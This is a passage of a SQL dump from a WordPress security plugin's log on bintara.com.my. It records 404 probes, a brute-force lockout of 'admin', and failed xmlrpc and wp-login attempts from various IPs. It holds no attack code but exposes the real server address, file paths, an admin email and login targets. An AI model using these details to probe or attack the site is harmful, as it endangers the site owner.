m.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/e/member/2.asp\";s:10:\"SCRIPT_URL\";s:15:\"/e/member/2.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa2UBqjZzpoQqaKQA3IeHQAAAMI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571656712.7741\";s:12:\"REQUEST_TIME\";s:10:\"1571656712\";}}','notice','2019-10-21 11:18:44','2019-10-21 11:18:33',35340952,37134384,'http://bintara.com.my//e/member/2.asp',1,0,'210.211.2.250'),(28579,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"//e/member/2.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"684\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"60.207.53.165\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"60.207.53.165\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/e/member/2.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/e/member/2.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa2UDW1ncq3cUuJao9Ib9AAAAJE\";s:12:\"REDIRECT_URL\";s:15:\"/e/member/2.asp\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"63260\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/e/member/2.asp\";s:10:\"SCRIPT_URL\";s:15:\"/e/member/2.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa2UDW1ncq3cUuJao9Ib9AAAAJE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571656720.6113\";s:12:\"REQUEST_TIME\";s:10:\"1571656720\";}}','notice','2019-10-21 11:19:00','2019-10-21 11:18:44',35266872,37069768,'http://bintara.com.my//e/member/2.asp',1,0,'60.207.53.165'),(23287,0,'lockout','username-lockout::admin','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:5:\"admin\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-08-27 04:50:46\";s:17:\"lockout_start_gmt\";s:19:\"2019-08-26 20:50:46\";s:14:\"lockout_expire\";s:19:\"2019-08-27 05:05:46\";s:18:\"lockout_expire_gmt\";s:19:\"2019-08-26 21:05:46\";s:16:\"lockout_username\";s:5:\"admin\";}','action','2019-08-26 20:50:48','2019-08-26 20:50:46',18390384,19511008,'http://bintara.com.my/www/xmlrpc.php',1,0,'184.168.152.144'),(23288,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-08-26 20:50:48','2019-08-26 20:50:46',18596800,19511008,'http://bintara.com.my/www/xmlrpc.php',1,0,'184.168.152.144'),(23289,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"165.22.94.219\";s:11:\"REMOTE_PORT\";s:5:\"33336\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRGmBTEVi0fEJEHuDZasgAAABU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566852761.0617\";s:12:\"REQUEST_TIME\";s:10:\"1566852761\";}}','notice','2019-08-26 20:52:42','2019-08-26 20:52:41',17681472,19173640,'https://bintara.com.my/wp-login.php',1,0,'165.22.94.219'),(23290,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"45.76.184.98\";s:11:\"REMOTE_PORT\";s:5:\"42811\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRImw0@TGWC-1tzGX5fqgAAAIo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566853275.2981\";s:12:\"REQUEST_TIME\";s:10:\"1566853275\";}}','notice','2019-08-26 21:01:16','2019-08-26 21:01:15',17690664,19181776,'https://bintara.com.my/wp-login.php',1,0,'45.76.184.98'),(23291,0,'brute_force','invalid-login::username-bintara.com.my','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:14:\"bintara.com.my\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"/store/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"357\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/store/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/store/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRJkoir4pgxiIHnHK4qPgAAAcw\";s:12:\"REDIRECT_URL\";s:17:\"/store/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:14:\"185.51.202.228\";s:11:\"REMOTE_PORT\";s:5:\"55474\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/store/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:17:\"/store/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRJkoir4pgxiIHnHK4qPgAAAcw\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566853522.6646\";s:12:\"REQUEST_TIME\";s:10:\"1566853522\";}}','notice','2019-08-26 21:05:24','2019-08-26 21:05:23',18307160,19507968,'http://bintara.com.my/store/xmlrpc.php',1,0,'185.51.202.228'),(23292,0,'brute_force','invalid-login::username-bintara.com.my','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:14:\"bintara.com.my\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/cms/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"357\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/cms/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/cms/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRJmxTEVi0fEJEHuDZcbAAAABY\";s:12:\"REDIRECT_URL\";s:15:\"/cms/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:12:\"95.216.17.17\";s:11:\"REMOTE_PORT\";s:5:\"41526\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/cms/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:15:\"/cms/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRJmxTEVi0fEJEHuDZcbAAAABY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566853532.0899\";s:12:\"REQUEST_TIME\";s:10:\"1566853532\";}}','notice','2019-08-26 21:05:34','2019-08-26 21:05:32',18306320,19509712,'http://bintara.com.my/cms/xmlrpc.php',1,0,'95.216.17.17'),(23293,0,'brute_force','invalid-login::username-bintara.com.my','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:14:\"bintara.com.my\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"/staging/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"355\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/staging/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/staging/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRJohTEVi0fEJEHuDZcbgAAAAI\";s:12:\"REDIRECT_URL\";s:19:\"/staging/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:14:\"74.220.219.114\";s:11:\"REMOTE_PORT\";s:5:\"22099\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/staging/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:19:\"/staging/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRJohTEVi0fEJEHuDZcbgAAAAI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566853539.0272\";s:12:\"REQUEST_TIME\";s:10:\"1566853539\";}}','notice','2019-08-26 21:05:41','2019-08-26 21:05:39',18306392,19507072,'http://bintara.com.my/staging/xmlrpc.php',1,0,'74.220.219.114'),(23294,0,'brute_force','invalid-login::username-bintara.com.my','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:14:\"bintara.com.my\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/news/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"360\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/news/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/news/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRJrBTEVi0fEJEHuDZccQAAABQ\";s:12:\"REDIRECT_URL\";s:16:\"/news/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:14:\"107.180.123.11\";s:11:\"REMOTE_PORT\";s:5:\"42204\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/news/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/news/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRJrBTEVi0fEJEHuDZccQAAABQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566853548.6553\";s:12:\"REQUEST_TIME\";s:10:\"1566853548\";}}','notice','2019-08-26 21:05:51','2019-08-26 21:05:49',18310040,19594016,'http://bintara.com.my/news/xmlrpc.php',1,0,'107.180.123.11'),(23295,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"/staging/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"342\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 